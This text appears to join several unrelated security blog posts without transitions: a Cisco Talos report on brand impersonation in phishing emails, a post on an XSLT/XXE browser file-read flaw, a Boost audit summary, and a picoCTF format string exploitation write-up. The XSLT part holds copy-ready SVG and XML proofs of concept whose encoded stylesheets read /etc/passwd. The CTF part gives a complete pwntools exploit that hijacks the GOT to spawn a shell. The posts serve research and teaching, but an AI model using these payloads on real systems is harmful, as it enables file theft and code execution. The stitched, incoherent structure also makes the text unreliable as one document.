Cisco recently developed and released a new feature to detect brand impersonation in emails when adversaries pretend to be a legitimate corporation.
Talos has discovered a wide range of techniques threat actors use to embed and deliver brand logos via emails to their victims.
Talos is providing new statistics and insights into detected brand impersonation cases over one month (March - April 2024).
In addition to deploying Cisco Secure Email, user education is key to detecting this type of threat.
Brand impersonation can happen on many online platforms, including social media, websites, email and mobile applications. This type of threat exploits the familiarity and legitimacy of popular brand logos to solicit sensitive information from victims. In the context of email security, brand impersonation is commonly observed in phishing emails. Threat actors abuse the popularity of well-known brands to deceive their victims into giving up their credentials or other sensitive information.
Brand logo embedding and delivery techniques
Threat actors employ a variety of techniques to embed brand logos within emails. One simple method involves inserting words associated with the brand into the HTML source of the email. In the example below, the PayPal logo can be found in plaintext in the HTML source of this email.
Sometimes, the email body is base64-encoded to make detection harder. A base64-encoded snippet of an email body is shown below.
The decoded HTML code is shown in the figure below. In this case, the Microsoft logo has been built via an HTML 2x2 table with four cells and various background colors.
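Reproducing the decoding step is straightforward. Below is a minimal sketch (the sample HTML, brand list and function name are hypothetical, not Cisco's actual engine) of how a filter might decode a base64-encoded body part and scan it for brand keywords:

```python
import base64
import re

def find_brand_keywords(b64_part: bytes, brands=("paypal", "microsoft", "docusign")):
    """Decode a base64-encoded body part and scan the HTML for brand terms."""
    html = base64.b64decode(b64_part).decode("utf-8", errors="replace")
    return [brand for brand in brands if re.search(brand, html, re.IGNORECASE)]

# Hypothetical base64-encoded HTML body, as it might appear in a MIME part
encoded = base64.b64encode(b"<html><body><p>PayPal account verification</p></body></html>")
print(find_brand_keywords(encoded))  # ['paypal']
```

Real engines go far beyond keyword matching (e.g., rendering the HTML and classifying the logo image), but the decoding step is the same.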
A more advanced technique is to fetch the brand logo from remote servers at delivery time. In this technique, the URI of the resource is embedded in the HTML source of the email, either in plaintext or base64-encoded. The logo in the example below is fetched from the following address: hxxps://image[.]member.americanexpress[.]com/.../AMXIMG_250x250_amex_logo.jpg
Another technique threat actors use is to deliver the brand logo via attachments. One of the most common techniques is to only include the brand logo as an image attachment. In this case, the logo is normally base64-encoded to evade detection. Email clients automatically fetch and render these logos if they’re referenced from the HTML source of the email. In this example, the Microsoft logo is attached to this email as a PNG file and referenced in an <img> HTML tag.
In other cases, the whole email body, including the brand logo, is attached as an image to the email and is shown to the victim by the email client. The example below is a brand impersonation case where the whole body is included in the PNG attachment, named “shark.png”. Also, an “inline” keyword can be seen in the HTML source of this email. When Content-Disposition is set to "inline," it indicates that the attached content should be displayed within the body of the email itself, rather than being treated as a downloadable attachment.
A brand logo may also be embedded within a PDF attachment. In the example shown below, the whole email body is included in a PDF attachment. This email is a QR code phishing email that is also impersonating the Bluebeam brand.
The scope of brand impersonation
An efficient brand impersonation detection engine plays a key role in an email security product. The extracted information from correctly convicted emails is valuable for threat researchers and customers. Using Cisco Secure Email Threat Defense’s brand impersonation detection engine, we uncovered the true scope of how widespread these attacks are. All data reflects the period between March 22 and April 22, 2024.
Threat researchers can use this information to block future attacks, potentially based on the sender’s email address and domain, the originating IP addresses of brand impersonation attacks, their attachments, the URLs found from such emails, and even phone numbers.
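Phone numbers in particular are a useful pivot for callback-phishing campaigns. A minimal sketch (a loose, illustrative regex that only covers common North American formats; the sample body is hypothetical) of extracting them from a message:

```python
import re

# Loose North American phone pattern; production extractors handle many more formats
PHONE_RE = re.compile(r"\+?1?[\s.(-]*\d{3}[\s.)-]*\d{3}[\s.-]*\d{4}")

body = "Your subscription renewed. To cancel, call +1 (888) 555-0142 today."
print(PHONE_RE.findall(body))  # ['+1 (888) 555-0142']
```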
The chart below shows the top sender domains of emails crafted by attackers to convince victims to call a number (i.e., Telephone-Oriented Attack Delivery) by impersonating the Best Buy Geek Squad, Norton and PayPal brands. Free email services are widely used by adversaries to send such emails, although less popular domains also appear.
Sometimes, similar brand impersonation emails are sent from a wide range of domains. For example, as shown in the heatmap below, emails impersonating the DocuSign brand were sent from two different domains to our customers on March 28. In other cases, emails are sent from a single domain (e.g., emails impersonating the Geek Squad and McAfee brands).
Brand impersonation emails may target specific industry verticals, or they might be sent indiscriminately. As shown in the chart below, four brand impersonation emails from hotmail.com and softbased.top domains were sent to our customers that would be categorized as either educational or insurance companies. On the other hand, emails from biglobe.ne.jp targeted a wider range of industry verticals.
Cisco customers can also benefit from information provided by the brand impersonation detection engine. By sharing the list of the most frequently impersonated brands with them regularly, they can train their employees to stay vigilant when they observe specific brands in emails.
Microsoft was the most frequently impersonated brand over the month we observed, followed by DocuSign. Most emails that contained these brands were fake SharePoint and DocuSign phishing messages. Two examples are provided below.
Other top frequently impersonated brands such as NortonLifeLock, PayPal, Chase, Geek Squad and Walmart were mostly seen in callback phishing messages. In this technique, the attackers include a phone number in the email and try to persuade recipients to call that number, thereby changing the communication channel away from email. From there, they may send another link to their victims to deliver different types of malware. The attackers normally do so by impersonating well-known and familiar brands. Two examples of such emails are provided below.
Protect against brand impersonation
Strengthening the weakest link
Humans are still the weakest link in cybersecurity, so educating users is of paramount importance for reducing the number and impact of security breaches. This education should not be limited to employees within a specific organization; in this case, it also extends to their customers.
Employees should know an organization’s trusted partners and the way their organization communicates with them. This way, when an anomaly occurs in that form of communication, they will be able to identify issues faster. Customers, in turn, need to know the communication methods your organization would use to contact them, as well as the type of information you will be asking for. When they know these two vital details, they will be less likely to share their sensitive information over abnormal communication channels (e.g., through unexpected emails or text messages).
Brand impersonation techniques are evolving in terms of sophistication, and differentiating fake emails from legitimate ones by a human or even a security researcher demands more time and effort. Therefore, more advanced techniques are required to detect these types of threats.
Asset protection
Well-known brands can also protect themselves from this type of threat through asset protection. Domain names can be registered with various extensions to thwart threat actors attempting to use similar domains for malicious purposes. Another crucial step brands can take is to conceal their information from WHOIS records via privacy protection. Last but not least, domain registrations need to be renewed on time, since expired domains can easily be abused by threat actors for illicit activities that harm your business reputation. Brand names should be registered properly so that your organization can take legal action when brand impersonation occurs.
Advanced detection methods
Detection methods can be improved to limit users’ exposure to malicious emails. Machine learning has improved significantly over the past few years due to advancements in computing resources, the availability of data, and the introduction of new machine learning architectures. Machine learning-based security solutions can be leveraged to improve detection efficacy.
Cisco Talos relies on a wide range of systems to detect this type of threat and protect our customers, from rule-based engines to advanced ML-based systems. Learn more about Cisco Secure Email Threat Defense's new brand impersonation detection tools here.
A year ago, I wondered what a malicious page with disabled JavaScript could do.
I knew that SVG, which is based on XML, and XML itself could be complex and allow file access. Is the Same Origin Policy (SOP) correctly implemented for all possible XML and SVG syntaxes? Is access through the file:// protocol properly handled?
Since I was too lazy to read the documentation, I started generating examples using ChatGPT.
XSL
The technology I decided to test is XSL, the eXtensible Stylesheet Language. It’s a specialized XML-based language that can be used within or outside of XML documents to transform them or extract data.
In Chrome, XSL is supported and the library used is LibXSLT. It’s possible to verify this by using the system-property('xsl:vendor') function, as shown in the following example.
Here is the output of the system-properties.xml file, uploaded to the local web server and opened in Chrome:
The LibXSLT library, first released on September 23, 1999, is both longstanding and widely used. It is a default component in Chrome, Safari, PHP, PostgreSQL, Oracle Database, Python, and numerous other applications.
The first interesting XSL output from ChatGPT was code that retrieves the location of the current document. While this is not a vulnerability, it could be useful in some scenarios.
<?xml-stylesheet href="get-location.xsl" type="text/xsl"?>
<!DOCTYPE test [
<!ENTITY ent SYSTEM "?" NDATA aaa>
]>
<test>
<getLocation test="ent"/>
</test>
Here is what you should see after uploading this code to your web server:
All the magic happens within the unparsed-entity-uri() function. This function returns the full path of the “ent” entity, which is constructed using the relative path “?”.
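The same relative-reference resolution can be illustrated outside XSL. A sketch using Python's urllib (the document URL is hypothetical) of how a bare "?" resolves against the document's own location, which is exactly the information unparsed-entity-uri() leaks:

```python
from urllib.parse import urljoin

# Hypothetical URL of the XML document being processed
doc_url = "http://example.com/dir/get-location.xml"

# A SYSTEM identifier of "?" is a relative reference, so it resolves
# against the document's URL and reveals the document's full location
resolved = urljoin(doc_url, "?")
print(resolved)
```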
XSL and Remote Content
Almost all XML-based languages have functionality that can be used for loading or displaying remote files, similar to the functionality of the <iframe> tag in HTML.
I asked ChatGPT many times about XSL’s content loading features. The examples below are what ChatGPT suggested I use, and the code was fully obtained from it.
XML External Entities
Since XSL is XML-based, usage of XML External Entities should be the first option.
Using an edited ChatGPT output, I crafted an XSL file that combined the document() function with XML External Entities in the file passed as its argument, utilizing the data: protocol. Next, I inserted the content of the XSL file into an XML file, also using the data: protocol.
When I opened my XML file via an HTTP URL from my mobile phone, I was shocked to see my iOS /etc/hosts file! Later, my friend Yaroslav Babin (a.k.a. @yarbabin) confirmed the same result on Android!
Android + Chrome
Next, I started testing offline HTML to PDF tools, and it turned out that file reading works there as well, despite their built-in restrictions.
There was no chance that this wasn’t a vulnerability!
Here is a photo of my Smart TV, where the file reading works as well:
I compiled a table summarizing all my tests:
Test Scenario          | Accessible Files
-----------------------|-------------------------------------
Android + Chrome       | /etc/hosts
iOS + Safari           | /etc/group, /etc/hosts, /etc/passwd
Windows + Chrome       | –
Ubuntu + Chrome        | –
PlayStation 4 + Chrome | –
Samsung TV + Chrome    | /etc/group, /etc/hosts, /etc/passwd
The likely root cause of this discrepancy is the differences between sandboxes. Running Chrome on Windows or Linux with the --no-sandbox attribute allows reading arbitrary files as the current user.
Other Tests
I have tested some applications that use LibXSLT and don’t have sandboxes.
App        | Result
-----------|------------------------------------------------------------
PHP        | Applications that allow control over XSLTProcessor::importStylesheet data can be affected.
XMLSEC     | The document() function did not allow http(s):// and data: URLs.
Oracle     | The document() function did not allow http(s):// and data: URLs.
PostgreSQL | The document() function did not allow http(s):// and data: URLs.
The default PHP configuration disables parsing of external entities in XML and XSL documents. However, this does not affect XML documents loaded by the document() function, and PHP allows the reading of arbitrary files using LibXSLT.
According to my tests, calling libxml_set_external_entity_loader(function ($a) {}); is sufficient to prevent the attack.
POCs
You will find all the POCs in a ZIP archive at the end of this section. Note that these are not zero-day POCs; details on reporting to the vendor and bounty information will also be provided later.
First, I created a simple HTML page with multiple <iframe> elements to test all possible file read functionalities and all possible ways to chain them:
The result of opening the xxe_all_tests/test.html page in an outdated Chrome
Open this page in Chrome, Safari, or Electron-like apps. It may read system files with default sandbox settings; without the sandbox, it may read arbitrary files with the current user’s rights.
As you can see now, only one of the call chains leads to an XXE in Chrome, and we were very fortunate to find it. Here is my schematic of the chain for better understanding:
Next, I created minified XML, SVG, and HTML POCs that you can copy directly from the article.
poc.svg
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgbWV0aG9kPSJ4bWwiLz4KPHhzbDp0ZW1wbGF0ZSBtYXRjaD0iLyI+CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPGZvcmVpZ25PYmplY3Qgd2lkdGg9IjMwMCIgaGVpZ2h0PSI2MDAiPgo8ZGl2IHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KTGlicmFyeTogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlbmRvcicpIiAvPjx4c2w6dmFsdWUtb2Ygc2VsZWN0PSJzeXN0ZW0tcHJvcGVydHkoJ3hzbDp2ZXJzaW9uJykiIC8+PGJyIC8+IApMb2NhdGlvbjogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InVucGFyc2VkLWVudGl0eS11cmkoLyovQGxvY2F0aW9uKSIgLz4gIDxici8+ClhTTCBkb2N1bWVudCgpIFhYRTogCjx4c2w6Y29weS1vZiAgc2VsZWN0PSJkb2N1bWVudCgnZGF0YTosJTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIyVVRGLTglMjIlM0YlM0UlMEElM0MlMjFET0NUWVBFJTIweHhlJTIwJTVCJTIwJTNDJTIxRU5USVRZJTIweHhlJTIwU1lTVEVNJTIwJTIyZmlsZTovLy9ldGMvcGFzc3dkJTIyJTNFJTIwJTVEJTNFJTBBJTNDeHhlJTNFJTBBJTI2eHhlJTNCJTBBJTNDJTJGeHhlJTNFJykiLz4KPC9kaXY+CjwvZm9yZWlnbk9iamVjdD4KPC9zdmc+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?>
<!DOCTYPE svg [
<!ENTITY ent SYSTEM "?" NDATA aaa>
]>
<svg location="ent" />
poc.xml
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgdHlwZT0iaHRtbCIvPgo8eHNsOnRlbXBsYXRlIG1hdGNoPSJ0ZXN0MSI+CjxodG1sPgpMaWJyYXJ5OiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0ic3lzdGVtLXByb3BlcnR5KCd4c2w6dmVuZG9yJykiIC8+PHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlcnNpb24nKSIgLz48YnIgLz4gCkxvY2F0aW9uOiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0idW5wYXJzZWQtZW50aXR5LXVyaShAbG9jYXRpb24pIiAvPiAgPGJyLz4KWFNMIGRvY3VtZW50KCkgWFhFOiAKPHhzbDpjb3B5LW9mICBzZWxlY3Q9ImRvY3VtZW50KCdkYXRhOiwlM0MlM0Z4bWwlMjB2ZXJzaW9uJTNEJTIyMS4wJTIyJTIwZW5jb2RpbmclM0QlMjJVVEYtOCUyMiUzRiUzRSUwQSUzQyUyMURPQ1RZUEUlMjB4eGUlMjAlNUIlMjAlM0MlMjFFTlRJVFklMjB4eGUlMjBTWVNURU0lMjAlMjJmaWxlOi8vL2V0Yy9wYXNzd2QlMjIlM0UlMjAlNUQlM0UlMEElM0N4eGUlM0UlMEElMjZ4eGUlM0IlMEElM0MlMkZ4eGUlM0UnKSIvPgo8L2h0bWw+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?>
<!DOCTYPE test [
<!ENTITY ent SYSTEM "?" NDATA aaa>
]>
<test1 location="ent"/>
TL;DR Shielder, with OSTIF and Amazon Web Services, performed a Security Audit on a subset of the Boost C++ libraries. The audit resulted in five (5) findings ranging from low to medium severity plus two (2) informative notices. The Boost maintainers of the affected libraries addressed some of the issues, while others were acknowledged as accepted risks.
Today, we are publishing the full report in our dedicated repository.
Introduction In December 2023, Shielder was hired to perform a Security Audit of Boost, a set of free peer-reviewed portable C++ source libraries.
This blogpost covers a Capture The Flag challenge that was part of the 2024 picoCTF event that lasted until Tuesday 26/03/2024. With a team from NVISO, we decided to participate and tackle as many challenges as we could, resulting in a rewarding 130th place in the global scoreboard. I decided to try and focus on the binary exploitation challenges. While having followed Corelan’s Stack & Heap exploitation on Windows courses, Linux binary exploitation was fairly new to me, providing a nice challenge while trying to fill that knowledge gap.
The challenge covers a format string vulnerability. This is a type of vulnerability where submitted data of an input string is evaluated as an argument to an unsafe use of e.g., a printf() function by the application, resulting in the ability to read and/or write to memory. The format string 3 challenge provides 4 files:
The vulnerable binary format-string-3 (download link)
The vulnerable binary source code format-string-3.c (download link)
A dynamic linker as the interpreter ld-linux-x86-64.so.2 (download link)
The libc library libc.so.6 (download link)
These files are provided to analyze the vulnerability locally, but the goal is to craft an exploit to attack a remote target that runs the vulnerable binary.
The steps of the final exploit:
Fetch the address of the setvbuf function in libc. This is provided by the vulnerable binary itself, which prints the address to stdout via printf() to simulate an information leak,
Dynamically calculate the base address of the libc library,
Overwrite the puts function address in the Global Offset Table (GOT) with the system function address using a format string vulnerability.
For step 2, it’s important to calculate the address dynamically (rather than hardcoding it), since the remote target loads modules at different addresses every time it runs: executing the binary multiple times prints a different memory address each time. This is due to the combination of Address Space Layout Randomization (ASLR) and the Position Independent Executable (PIE) compiler flag. The latter can be verified by running readelf on the binary, which is provided as part of the challenge.
Then, by spawning a shell, we can read and submit the flag file content to solve the challenge.
Vulnerability Details
Background on string formatting
The challenge involved a format string vulnerability, as suggested by its name and description. This vulnerability arises when user input is directly passed and used as arguments to functions such as the C library’s printf() and its variants:
Even with input validation in place, passing input directly to one of these functions (think: printf(input)) should be avoided. It’s recommended to use placeholders and string formatting such as printf("%s", input) instead.
The impact of a format string vulnerability can be divided into a few categories:
Ability to read values on the stack
Arbitrary memory reads
Arbitrary memory writes
In the case where arbitrary memory writes are possible, an adversary may obtain full control over the execution flow of the program and potentially even remote code execution.
Background on Global Offset Table
Both the Procedure Linkage Table (PLT) & Global Offset Table (GOT) play a crucial role in the execution of programs, especially those compiled using shared libraries – almost any binary running on a modern system.
The GOT serves as a central repository for storing addresses of global variables and functions. In the current context of a CTF challenge featuring a format string vulnerability, understanding the GOT is crucial. Exploiting this vulnerability involves manipulating the addresses stored in the GOT to redirect program flow.
When a C program that calls function is compiled as an ELF executable, the call is compiled as function@plt. When the program is executed, it jumps to the PLT entry for function and:
If there is a GOT entry for function, it jumps to the address stored there;
If there is no GOT entry, the dynamic linker resolves the address, stores it in the GOT, and jumps there.
An example of the first option, where there is a GOT entry for function, is depicted in the visual below:
During the exploitation process, our goal is to overwrite entries in the GOT with addresses of our choosing. By doing so, we can redirect the program’s execution to arbitrary locations, such as shellcode or other parts of memory under our control.
Reviewing the source code
We are provided with the following source code:
#include <stdio.h>

#define MAX_STRINGS 32

char *normal_string = "/bin/sh";

void setup() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
}

void hello() {
    puts("Howdy gamers!");
    printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
}

int main() {
    char *all_strings[MAX_STRINGS] = {NULL};
    char buf[1024] = {'\0'};
    setup();
    hello();
    fgets(buf, 1024, stdin);
    printf(buf);
    puts(normal_string);
    return 0;
}
Since we have a compiled version provided from the challenge, we can proceed and make it executable. We then do a test run, which provides the following output:
# Making both the executable & linker executable
chmod u+x format-string-3 ld-linux-x86-64.so.2
# Executing the binary
./format-string-3
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f7c778eb3f0
# This is our input, ending with <enter>
test
test
/bin/sh
We note a couple of things:
The binary provides us with the memory address of the setvbuf function in the libc library,
We have a way of providing a string as input which is read by the fgets function and printed back in an unsafe manner using printf,
The program finishes with a puts() function call that writes /bin/sh to stdout.
This is hinting towards a memory address overwrite of the puts() function to replace it with the system() function address. As a result, it will then execute system("/bin/sh") and spawn a shell.
Vulnerability #1: Memory Leak
If we take another look at the source code above, we notice the following line in the hello() function:
printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
Here, the creators of the challenge intentionally leak a memory address to make the challenge easier. If not, we would have to deal with finding an information leak ourselves to bypass Address Space Layout Randomization (ASLR), if enabled.
We can still treat this as an actual information leak that provides us a memory address during runtime. We will use this information to dynamically calculate the base address of the libc library based on the setvbuf function address in the exploitation section below.
Vulnerability #2: Format String Vulnerability
In the test run above we provided a simple test string as input to the program, which was printed back to stdout via the printf(buf) function call. In an excellent paper that can be found here, we learned that we can use format specifiers in C to:
Read arbitrary stack values, using format specifiers such as %x (hexadecimal) or %p (pointers),
Read from arbitrary memory addresses using a combination of %c to move the argument pointer and %s to print the contents of memory starting from an address we specify in our input string,
Write to arbitrary memory addresses by controlling the output counter using %mc, which increases the output counter by m. Then, we can write the output counter value to memory using %n, again provided we supply the target memory address correctly as part of our input string.
Even though the source code already indicates that our input is unsafely processed and parsed as an argument for the printf() function, we can verify that we have a format string vulnerability here by providing %p as input, which should read a value as a pointer and print it back to us:
# Executing the binary
./format-string-3
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f2818f423f0
# This is our input, ending with <enter>
%p
# This is the output of the printf(buf) function call
# This now prints back a value as a pointer
0x7f28190a0963
/bin/sh
The challenge preceding format string 3, called format string 2, actually provided very good practice to get to know format string specifiers and how you can abuse them to read from memory and write to memory. Highly recommended!
Exploitation
We are now armed with an information leak that provides us a memory address and a format string vulnerability. Let’s try and combine these two to get code execution on our remote system.
Calculating input string offset
Before we can really start, there is something we need to address: how do we know where our input string is located in memory once we have sent it to the program? And why does this even matter?
Let’s first have a look at the input AAAAAAAA%2$p. This provides 8 A characters, and then a format specifier to read the 2nd argument to the printf() function, which will, in this case, be a value from memory:
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7fa5ae99b3f0
AAAAAAAA%2$p
AAAAAAAA0xfbad208b
/bin/sh
Ideally (we’ll explain why later), we have a format specifier %n$p where n is an offset pointing exactly at the start of our input string. You can find this offset manually (%p, %2$p, %3$p…) until the output points to your input string, but I did it using gdb:
# Open the program in gdb
gdb format-string-3
# Put a breakpoint at the puts function
b puts
# Run the program
r
# Continue the program since it will hit the breakpoint
# on the first puts call in our program (Howdy gamers!)
c
# Provide our input AAAAAAAA followed by <enter>
AAAAAAAA
The program should now hit the breakpoint on puts() again, after which we can look at the stack using context_stack 50 to print 50×8 bytes on the stack. You should be able to identify your input string on the 33rd line, which we can easily calculate by dividing the number of bytes by 8:
You could assume that 33 is the offset we need, but there’s a catch:
On 64b systems, the first 5 %lx will print the contents of the rsi, rdx, rcx, r8, and r9, and any additional %lx will start printing successive 8-byte values on the stack.
This means we need to add 5 to our offset to compensate for the 5 registers, resulting in a final offset of 38, as can be seen in the following visual:
The offset displayed on top of the visual indicates the relative offset from the start of the stack.
This offset now points exactly to the start of our input string:
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ff5ed4873f0
AAAAAAAA%38$p
AAAAAAAA0x4141414141414141
/bin/sh
AAAAAAAA is converted to 0x4141414141414141 in hexadecimal since we are printing the input string as a pointer using %p.
Now for the (probably) more critical question: why does it matter that we can point to our input string in memory? Up until this point, we have only been reading our own string in memory. What happens when we replace the reading %p format specifier with the %n format specifier?
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f4bfd3ff3f0
AAAAAAAA%38$n
zsh: segmentation fault  ./format-string-3
We get a segmentation fault. What is going on? printf now tries to write the value of the output counter to the memory address we were previously pointing at with %p, which is… our input string itself.
This means we now control where we write, since we control the input string. We can also control what we write to memory, as long as we control the output counter. We have control over this as well, as explained before:
Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m.
By changing the format specifier, we now executed the following:
To clearly grasp the concept: if we change our input string to BBBBBBBB, we will now write to 0x4242424242424242 instead, indicating we can control to which memory address we are writing something by modifying our input string.
In this case, we received a segmentation fault since the memory at 0x4141414141414141 is not writeable (page protections, not mapped…). In the next part, we’re going to convert our arbitrary write primitive to effectively do something useful by overwriting an entry in the Global Offset Table.
Local Exploitation
Let’s take a step back and think about what we logically need to do. We need to:
Fetch the address of our setvbuf function in the libc library, provided by the program,
From this address, calculate the base address of libc,
Send a format string payload that overwrites the puts function address in the GOT with the system function address in libc,
Continue execution to give control to the operator.
We are going to use the popular pwntools library for Python 3 to help us out quite a bit.
First, let’s attach to our program and print the lines until we hit the libc: output string, then store the memory address in an integer:
from pwn import *

p = process("./format-string-3")
info(p.recvline())  # Fetch Howdy gamers!
info(p.recvuntil("libc: "))  # Fetch line right before the setvbuf address

# Get setvbuf address
bytes_setvbuf_address = p.recvline()
# Convert output bytes to integer to store and work with our address
setvbuf_leak = int(bytes_setvbuf_address.split(b"x")[1].strip(), 16)
info("Received setvbuf address leak: %s", hex(setvbuf_leak))
### Sample Output
[+] Starting local process './format-string-3': pid 216507
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc:
[*] Received setvbuf address leak: 0x7fb19acc83f0
[*] Stopped process './format-string-3' (pid 216507)
Second, we manually load libc so that we can set its base address to match our (now local, but future remote) target’s libc base address. We do this by subtracting setvbuf’s offset in our manually loaded libc from the leaked setvbuf address:
...
libc = ELF("./libc.so.6")
info("Calculating libc base address...")
libc.address = setvbuf_leak - libc.symbols['setvbuf']
info("libc base address: %s", hex(libc.address))
### Sample Output
[+] Starting local process './format-string-3': pid 219013
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc:
[*] Received setvbuf address leak: 0x7f25a21de3f0
[*] Calculating libc base address...
[*] libc base address: 0x7f25a2164000
[*] Stopped process './format-string-3' (pid 219013)
Finally, we can utilize the fmtstr_payload function of pwntools to easily write:
What: the system function address in libc
Where: the puts entry in the GOT of our binary
Before actually executing and sending our payload, let’s make sure we understand what’s happening. We start by noting down the addresses of:
the system function address in libc (0x7f852ddca760)
the puts entry in the GOT of our binary (0x404018)
next to the payload we are going to send in an interactive Python prompt, for demonstration purposes:
You can divide the payload into blocks, each serving the purpose we expected, although it’s quite a step up from what we’ve done manually before. We can identify the pattern %mc%n$hhn (or ending in lln), which:
Increases the output counter with m (note that the output counter does not necessarily start at 0)
Writes the value of the output counter to the address selected by %n$hhn. The first n selects the relevant entry on the stack where our input string memory address is located. The second part, $hhn, resembles our expected %n format specifier, but the double hh is a modifier to truncate the output counter value to the size of a char, thus allowing us to write 1 byte.
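To make the counter arithmetic concrete, here is a small plain-Python simulation (not pwntools; the helper name and numbers are illustrative) of how %mc increments the counter and how the hh/ll length modifiers truncate what a %n-style write stores:

```python
def simulate_writes(blocks):
    """Simulate %mc%n-style blocks: each block is (chars_printed, write_size_bytes).
    Returns the value each write would store at its target address."""
    counter = 0
    written = []
    for chars, size in blocks:
        counter += chars                 # %mc pads m characters onto the output
        mask = (1 << (8 * size)) - 1     # hh -> 1 byte, ll -> 8 bytes
        written.append(counter & mask)   # %n stores the (truncated) counter
    return written

# An 8-byte (lln) write of 96, followed by a 1-byte (hhn) write of 96+31=127
print(simulate_writes([(96, 8), (31, 1)]))  # [96, 127]

# Truncation in action: print 300 characters, then write a single byte
print(simulate_writes([(300, 1)]))          # [44], i.e. 300 & 0xff
```

This is exactly why fmtstr_payload chains several small writes: each hhn write can only place one byte, but the counter keeps accumulating across blocks.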
Let's now analyze the payload and work through one write operation ourselves to understand how it works. The first block of our payload is %96c%47$lln, which can logically be seen as a single write operation. This:
Increases the output counter by 96 (printf field widths are decimal, so this is 96 characters, or 0x60 in hex)
Writes the current value of the output counter (n, sized as a long long (ll), or 8 bytes) to the memory address found at stack offset 47:
As you can see in the payload above, offset 47 corresponds to \x18@@\x00\x00\x00\x00\x00, which sits further down our payload. @ is \x40 in hex, so our target address matches the value of the puts entry in the GOT if we swap the endianness: \x00\x00\x00\x00\x00\x40\x40\x18, or 0x404018. This clearly indicates we are writing to the correct memory location, as expected.
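You can verify this byte layout yourself with Python's struct module, independent of the exploit script:

```python
import struct

puts_got = 0x404018  # puts entry in the GOT, from the write-up

# Little-endian packing reproduces the bytes embedded in the payload:
# 0x18, then two 0x40 ('@') bytes, then five null bytes
packed = struct.pack("<Q", puts_got)
print(packed)  # b'\x18@@\x00\x00\x00\x00\x00'

# Interpreting those bytes as a little-endian integer recovers the address
assert int.from_bytes(packed, "little") == puts_got
```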
You’ll notice that aaaabaa is also part of our payload: this serves as padding to correctly align our payload to have 8-byte addresses on the stack. The start of an offset on the stack should contain exactly the start of our 8-byte memory address to write to, since we’re working on a 64-bit system. If no padding is present, a reference to an offset would start in the middle of a memory address.
After this write, the payload continues with the next block, %31c%48$hhn, which again increases the output counter and writes to the next offset (48). This offset contains our next address. The payload continues until all 6 blocks are executed, which corresponds to the 6 %…%n statements.
Now that we understand the payload, we load the binary using ELF and send our payload to our target process, after which we give interactive control to the operator:
```python
...
elf = context.binary = ELF('./format-string-3')
info("Creating format string payload...")
payload = fmtstr_payload(38, {elf.got['puts']: libc.symbols['system']})

# Ready to send payload!
info("Sending payload...")
p.sendline(payload)
p.clean()

# Give control of the shell to the operator
info("Payload successfully sent, enjoy the shell!")
p.interactive()
```
The fmtstr_payload function, combined with the elf and libc references, does a lot of heavy lifting for us. It effectively writes the complete address of libc.symbols['system'] to the location where elf.got['puts'] originally was in memory by precisely modifying the output counter and executing the memory write operations.
```bash
### Sample Output
[+] Starting local process './format-string-3': pid 227263
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc:
[*] Received setvbuf address leak: 0x7fa7c29473f0
[*] '/home/kali/picoctf/libc.so.6'
[*] Calculating libc base address...
[*] libc base address: 0x7fa7c28cd000
[*] '/home/kali/picoctf/format-string-3'
[*] Creating format string payload...
[*] Sending payload...
[*] Payload successfully sent, enjoy the shell!
[*] Switching to interactive mode
$ whoami
kali
```
We successfully exploited the format string vulnerability and called system('/bin/sh'), resulting in an interactive shell!
Remote Exploitation
Switching to remote exploitation is trivial in this challenge, since we can simply reuse the local files to do our calculations. Instead of attaching to a local process using p = process("./format-string-3"), we substitute this by connecting to a remote target:
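The substitution can be sketched as follows; the hostname and port below are placeholders for the instance-specific values the picoCTF platform gives you:

```python
from pwn import *

# Previously: attach to a local process
# p = process("./format-string-3")

# Now: connect to the remote instance instead (placeholder host and port)
p = remote("rhea.picoctf.net", 12345)
```

Everything after this line (the leak parsing, libc base calculation and payload) stays the same, since the calculations use the local copies of the binary and libc.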
